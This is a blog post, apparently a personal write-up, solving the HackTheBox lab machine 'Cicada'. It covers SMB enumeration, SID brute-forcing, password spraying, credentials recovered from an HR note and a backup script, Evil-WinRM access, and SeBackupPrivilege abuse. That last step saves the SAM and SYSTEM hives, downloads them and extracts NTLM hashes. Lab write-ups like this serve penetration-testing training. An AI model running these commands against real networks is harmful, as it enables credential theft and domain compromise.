<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Enemuration1└─$ rustscan -a 10.10.11.35 -- -sC -sV -Pn 這是AD環境，domain cicada.htb 1└─$ enum4linux-ng -A 10.10.11.35  1└─$ smbmap -u guest  -p &quot;&quot;  -H 10.10.11.35 去看 HRNotice from HR.txt 1234567">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB Cicada">
<meta property="og:url" content="http://example.com/2025/01/06/HTB-Cicada/index.html">
<meta property="og:site_name" content="wang&#39;s blog">
<meta property="og:description" content="Enemuration1└─$ rustscan -a 10.10.11.35 -- -sC -sV -Pn 這是AD環境，domain cicada.htb 1└─$ enum4linux-ng -A 10.10.11.35  1└─$ smbmap -u guest  -p &quot;&quot;  -H 10.10.11.35 去看 HRNotice from HR.txt 1234567">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://hackmd.io/_uploads/SJOwmhD8ke.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rycom3wUkl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/Hk3zVhw8Jl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rJ046pwLkx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/By_YE2PIyl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/H1_7BhP8kx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SyYL7aPIye.png">
<meta property="og:image" content="https://hackmd.io/_uploads/Hk4mQTPIkx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/S1yCvTv8Jl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/Bks4E6vUyx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/r1Jeg0P8kg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/H1XVZCw8yx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/H1V2bAv8kl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rkYXzCPU1l.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rJoqDCDU1e.png">
<meta property="og:image" content="https://hackmd.io/_uploads/B1TZVJdI1e.png">
<meta property="og:image" content="https://hackmd.io/_uploads/H1h-4Xd8yx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rkgtM7uL1l.png">
<meta property="article:published_time" content="2025-01-06T14:24:04.000Z">
<meta property="article:modified_time" content="2025-05-02T14:28:40.309Z">
<meta property="article:author" content="wang">
<meta property="article:tag" content="Pentesting">
<meta property="article:tag" content="HackTheBox">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hackmd.io/_uploads/SJOwmhD8ke.png">
    
    
    <!-- title -->
    <title>HTB Cicada</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-86660611-1"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'UA-86660611-1');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tag/">Tag</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/01/07/HTB-Chemistry/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/01/03/HTB-UnderPass/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/01/06/HTB-Cicada/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/01/06/HTB-Cicada/&text=HTB Cicada"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/01/06/HTB-Cicada/&is_video=false&description=HTB Cicada"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HTB Cicada&body=Check out this article: http://example.com/2025/01/06/HTB-Cicada/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/01/06/HTB-Cicada/&name=HTB Cicada&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/01/06/HTB-Cicada/&t=HTB Cicada"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Enemuration"><span class="toc-number">1.</span> <span class="toc-text">Enemuration</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">2.</span> <span class="toc-text">Privilege Escalation</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        HTB Cicada
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">wang</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-01-06T14:24:04.000Z" class="dt-published" itemprop="datePublished">2025-01-06</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/HackTheBox/" rel="tag">HackTheBox</a>, <a class="p-category" href="/tags/Pentesting/" rel="tag">Pentesting</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h3 id="Enemuration"><a href="#Enemuration" class="headerlink" title="Enemuration"></a>Enemuration</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─$ rustscan -a 10.10.11.35 -- -sC -sV -Pn</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/SJOwmhD8ke.png" alt="image"><br><img src="https://hackmd.io/_uploads/rycom3wUkl.png" alt="image"><br><img src="https://hackmd.io/_uploads/Hk3zVhw8Jl.png" alt="image"><br>這是AD環境，domain <code>cicada.htb</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─$ enum4linux-ng -A 10.10.11.35</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/rJ046pwLkx.png" alt="image"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─$ smbmap -u guest  -p <span class="string">&quot;&quot;</span>  -H 10.10.11.35</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/By_YE2PIyl.png" alt="image"><br>去看 HR<br><img src="https://hackmd.io/_uploads/H1_7BhP8kx.png" alt="image"><br>Notice from HR.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">Dear new hire!</span><br><span class="line"></span><br><span class="line">Welcome to Cicada Corp! We&#x27;re thrilled to have you join our team. As part of our security protocols, it&#x27;s essential that you change your default password to something unique and secure.</span><br><span class="line"></span><br><span class="line">Your default password is: Cicada$M6Corpb*@Lp#nZp!8</span><br><span class="line"></span><br><span class="line">To change your password:</span><br><span class="line"></span><br><span class="line">1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.</span><br><span class="line">2. Once logged in, navigate to your account settings or profile settings section.</span><br><span class="line">3. Look for the option to change your password. This will be labeled as &quot;Change Password&quot;.</span><br><span class="line">4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.</span><br><span class="line">5. After changing your password, make sure to save your changes.</span><br><span class="line"></span><br><span class="line">Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.</span><br><span class="line"></span><br><span class="line">If you encounter any issues or need assistance with changing your password, don&#x27;t hesitate to reach out to our support team at support@cicada.htb.</span><br><span class="line"></span><br><span class="line">Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!</span><br><span class="line"></span><br><span class="line">Best regards,</span><br><span class="line">Cicada Corp</span><br></pre></td></tr></table></figure>
<p>密碼 <code>Cicada$M6Corpb*@Lp#nZp!8</code> 但不知道對應的帳戶</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">└─$ lookupsid.py cicada.htb/guest@10.10.11.35</span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">Password:</span><br><span class="line">[*] Brute forcing SIDs at 10.10.11.35</span><br><span class="line">[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]</span><br><span class="line">[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727</span><br><span class="line">498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)</span><br><span class="line">500: CICADA\Administrator (SidTypeUser)</span><br><span class="line">501: CICADA\Guest (SidTypeUser)</span><br><span class="line">502: CICADA\krbtgt (SidTypeUser)</span><br><span class="line">512: CICADA\Domain Admins (SidTypeGroup)</span><br><span class="line">513: CICADA\Domain Users (SidTypeGroup)</span><br><span class="line">514: CICADA\Domain Guests (SidTypeGroup)</span><br><span class="line">515: CICADA\Domain Computers (SidTypeGroup)</span><br><span class="line">516: CICADA\Domain Controllers (SidTypeGroup)</span><br><span class="line">517: CICADA\Cert Publishers (SidTypeAlias)</span><br><span class="line">518: CICADA\Schema Admins (SidTypeGroup)</span><br><span class="line">519: CICADA\Enterprise Admins (SidTypeGroup)</span><br><span class="line">520: CICADA\Group Policy Creator Owners (SidTypeGroup)</span><br><span class="line">521: CICADA\Read-only Domain Controllers (SidTypeGroup)</span><br><span class="line">522: CICADA\Cloneable Domain Controllers (SidTypeGroup)</span><br><span class="line">525: CICADA\Protected Users (SidTypeGroup)</span><br><span class="line">526: CICADA\Key Admins (SidTypeGroup)</span><br><span class="line">527: CICADA\Enterprise Key Admins (SidTypeGroup)</span><br><span class="line">553: CICADA\RAS and IAS Servers (SidTypeAlias)</span><br><span class="line">571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)</span><br><span class="line">572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)</span><br><span class="line">1000: CICADA\CICADA-DC$ (SidTypeUser)</span><br><span class="line">1101: CICADA\DnsAdmins (SidTypeAlias)</span><br><span class="line">1102: CICADA\DnsUpdateProxy (SidTypeGroup)</span><br><span class="line">1103: CICADA\Groups (SidTypeGroup)</span><br><span class="line">1104: CICADA\john.smoulder (SidTypeUser)</span><br><span class="line">1105: CICADA\sarah.dantelia (SidTypeUser)</span><br><span class="line">1106: CICADA\michael.wrightson (SidTypeUser)</span><br><span class="line">1108: CICADA\david.orelious (SidTypeUser)</span><br><span class="line">1109: CICADA\Dev Support (SidTypeGroup)</span><br><span class="line">1601: CICADA\emily.oscars (SidTypeUser)</span><br></pre></td></tr></table></figure>
<p>SidTypeUser &#x3D;&gt; userlist.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Administrator</span><br><span class="line">Guest</span><br><span class="line">CICADA-DC$</span><br><span class="line">john.smoulder</span><br><span class="line">sarah.dantelia</span><br><span class="line">michael.wrightson</span><br><span class="line">david.orelious</span><br><span class="line">emily.oscars</span><br></pre></td></tr></table></figure>
<p>kerbrute 怪怪的，還是用 crackmapexec 比較準<br>雙引號也怪怪的，單引號比較不會報錯<br><img src="https://hackmd.io/_uploads/SyYL7aPIye.png" alt="image"><br><img src="https://hackmd.io/_uploads/Hk4mQTPIkx.png" alt="image"><br><code>cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8</code><br><img src="https://hackmd.io/_uploads/S1yCvTv8Jl.png" alt="image"><br>這個帳戶可能權限不夠，不能登入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─$ smbmap -u &#x27;michael.wrightson&#x27;  -p &#x27;Cicada$M6Corpb*@Lp#nZp!8&#x27;  -H 10.10.11.35</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/Bks4E6vUyx.png" alt="image"><br>去 NETLOGON、SYSVOL 看都沒有甚麼可以利用的東西<br>再用 enum4linux-ng 枚舉看看</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─$ enum4linux-ng -A -u <span class="string">&#x27;michael.wrightson&#x27;</span> -p <span class="string">&#x27;Cicada$M6Corpb*@Lp#nZp!8&#x27;</span> 10.10.11.35</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/r1Jeg0P8kg.png" alt="image"><br><code>david.orelious:aRt$Lp#7t*VQ!3</code><br><img src="https://hackmd.io/_uploads/H1XVZCw8yx.png" alt="image"><br>好像還是不能登入<br><img src="https://hackmd.io/_uploads/H1V2bAv8kl.png" alt="image"><br>多了DEV可以讀<br><img src="https://hackmd.io/_uploads/rkYXzCPU1l.png" alt="image"><br>Backup_script.ps1</p>
<figure class="highlight ps"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sourceDirectory</span> = <span class="string">&quot;C:\smb&quot;</span></span><br><span class="line"><span class="variable">$destinationDirectory</span> = <span class="string">&quot;D:\Backup&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$username</span> = <span class="string">&quot;emily.oscars&quot;</span></span><br><span class="line"><span class="variable">$password</span> = <span class="built_in">ConvertTo-SecureString</span> <span class="string">&quot;Q!3@Lp#M6b*7t*Vt&quot;</span> <span class="literal">-AsPlainText</span> <span class="literal">-Force</span></span><br><span class="line"><span class="variable">$credentials</span> = <span class="built_in">New-Object</span> System.Management.Automation.PSCredential(<span class="variable">$username</span>, <span class="variable">$password</span>)</span><br><span class="line"><span class="variable">$dateStamp</span> = <span class="built_in">Get-Date</span> <span class="literal">-Format</span> <span class="string">&quot;yyyyMMdd_HHmmss&quot;</span></span><br><span class="line"><span class="variable">$backupFileName</span> = <span class="string">&quot;smb_backup_<span class="variable">$dateStamp</span>.zip&quot;</span></span><br><span class="line"><span class="variable">$backupFilePath</span> = <span class="built_in">Join-Path</span> <span class="literal">-Path</span> <span class="variable">$destinationDirectory</span> <span class="literal">-ChildPath</span> <span class="variable">$backupFileName</span></span><br><span class="line"><span class="built_in">Compress-Archive</span> <span class="literal">-Path</span> <span class="variable">$sourceDirectory</span> <span class="literal">-DestinationPath</span> <span class="variable">$backupFilePath</span></span><br><span class="line"><span class="built_in">Write-Host</span> <span class="string">&quot;Backup completed successfully. Backup file saved to: <span class="variable">$backupFilePath</span>&quot;</span></span><br></pre></td></tr></table></figure>
<p>又一組帳密<br><code>emily.oscars:Q!3@Lp#M6b*7t*Vt</code><br>可以登入ㄌ<br><img src="https://hackmd.io/_uploads/rJoqDCDU1e.png" alt="image"><br>拿到user flag</p>
<h3 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h3><p><img src="https://hackmd.io/_uploads/B1TZVJdI1e.png" alt="image"><br>不是admin</p>
<p>查詢emily.oscars的權限</p>
<figure class="highlight ps"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\Users\emily.oscars.CICADA\Documents&gt; whoami /all</span><br><span class="line"></span><br><span class="line">USER INFORMATION</span><br><span class="line"><span class="literal">----------------</span></span><br><span class="line"></span><br><span class="line">User Name           SID</span><br><span class="line">=================== =============================================</span><br><span class="line">cicada\emily.oscars S<span class="literal">-1-5-21-917908876-1423158569-3159038727-1601</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">GROUP</span> INFORMATION</span><br><span class="line"><span class="literal">-----------------</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">Group</span> Name                                 <span class="built_in">Type</span>             SID          Attributes</span><br><span class="line">========================================== ================ ============ ==================================================</span><br><span class="line">Everyone                                   Well<span class="literal">-known</span> <span class="built_in">group</span> S<span class="literal">-1-1-0</span>      Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">BUILTIN\Backup Operators                   Alias            S<span class="literal">-1-5-32-551</span> Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">BUILTIN\Remote Management Users            Alias            S<span class="literal">-1-5-32-580</span> Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">BUILTIN\Users                              Alias            S<span class="literal">-1-5-32-545</span> Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">BUILTIN\Certificate Service DCOM Access    Alias            S<span class="literal">-1-5-32-574</span> Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">BUILTIN\Pre<span class="literal">-Windows</span> <span class="number">2000</span> Compatible Access Alias            S<span class="literal">-1-5-32-554</span> Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">NT AUTHORITY\NETWORK                       Well<span class="literal">-known</span> <span class="built_in">group</span> S<span class="literal">-1-5-2</span>      Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">NT AUTHORITY\Authenticated Users           Well<span class="literal">-known</span> <span class="built_in">group</span> S<span class="literal">-1-5-11</span>     Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">NT AUTHORITY\This Organization             Well<span class="literal">-known</span> <span class="built_in">group</span> S<span class="literal">-1-5-15</span>     Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">NT AUTHORITY\NTLM Authentication           Well<span class="literal">-known</span> <span class="built_in">group</span> S<span class="literal">-1-5-64-10</span>  Mandatory <span class="built_in">group</span>, Enabled by default, Enabled <span class="built_in">group</span></span><br><span class="line">Mandatory Label\High Mandatory Level       Label            S<span class="literal">-1-16-12288</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PRIVILEGES INFORMATION</span><br><span class="line"><span class="literal">----------------------</span></span><br><span class="line"></span><br><span class="line">Privilege Name                Description                    State</span><br><span class="line">============================= ============================== =======</span><br><span class="line">SeBackupPrivilege             Back up files and directories  Enabled</span><br><span class="line">SeRestorePrivilege            Restore files and directories  Enabled</span><br><span class="line">SeShutdownPrivilege           Shut down the system           Enabled</span><br><span class="line">SeChangeNotifyPrivilege       Bypass traverse checking       Enabled</span><br><span class="line">SeIncreaseWorkingSetPrivilege Increase a <span class="keyword">process</span> working <span class="built_in">set</span> Enabled</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">USER CLAIMS INFORMATION</span><br><span class="line"><span class="literal">-----------------------</span></span><br><span class="line"></span><br><span class="line">User claims unknown.</span><br><span class="line"></span><br><span class="line">Kerberos support <span class="keyword">for</span> Dynamic Access Control on this device has been disabled.</span><br></pre></td></tr></table></figure>
<p>注意到 <code>BUILTIN\Backup Operators</code>、<code>SeBackupPrivilege</code><br>有 <code>SeBackupPrivilege</code> &#x3D;&gt; 可讀 sam、system</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents&gt; <span class="built_in">cd</span> c:\</span><br><span class="line">*Evil-WinRM* PS C:\&gt; <span class="built_in">mkdir</span> Temp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                 LastWriteTime         Length Name</span><br><span class="line">----                 -------------         ------ ----</span><br><span class="line">d-----          1/5/2025   1:27 PM                Temp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\&gt; reg save hklm\sam c:\Temp\sam</span><br><span class="line">The operation completed successfully.</span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\&gt; reg save hklm\system c:\Temp\system</span><br><span class="line">The operation completed successfully.</span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\&gt; <span class="built_in">cd</span> Temp</span><br><span class="line">*Evil-WinRM* PS C:\Temp&gt; download sam</span><br><span class="line">                                        </span><br><span class="line">Info: Downloading C:\Temp\sam to sam</span><br><span class="line">                                        </span><br><span class="line">Info: Download successful!</span><br><span class="line">*Evil-WinRM* PS C:\Temp&gt; download system</span><br><span class="line">                                        </span><br><span class="line">Info: Downloading C:\Temp\system to system</span><br><span class="line">                                        </span><br><span class="line">Info: Download successful!</span><br></pre></td></tr></table></figure>
<p>在 local 提取 NTLMhash</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─$ pypykatz registry --sam sam system</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/H1h-4Xd8yx.png" alt="image"><br>取得 root shell<br><img src="https://hackmd.io/_uploads/rkgtM7uL1l.png" alt="image"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/tag/">Tag</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Enemuration"><span class="toc-number">1.</span> <span class="toc-text">Enemuration</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">2.</span> <span class="toc-text">Privilege Escalation</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/01/06/HTB-Cicada/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/01/06/HTB-Cicada/&text=HTB Cicada"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/01/06/HTB-Cicada/&title=HTB Cicada"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/01/06/HTB-Cicada/&is_video=false&description=HTB Cicada"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HTB Cicada&body=Check out this article: http://example.com/2025/01/06/HTB-Cicada/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
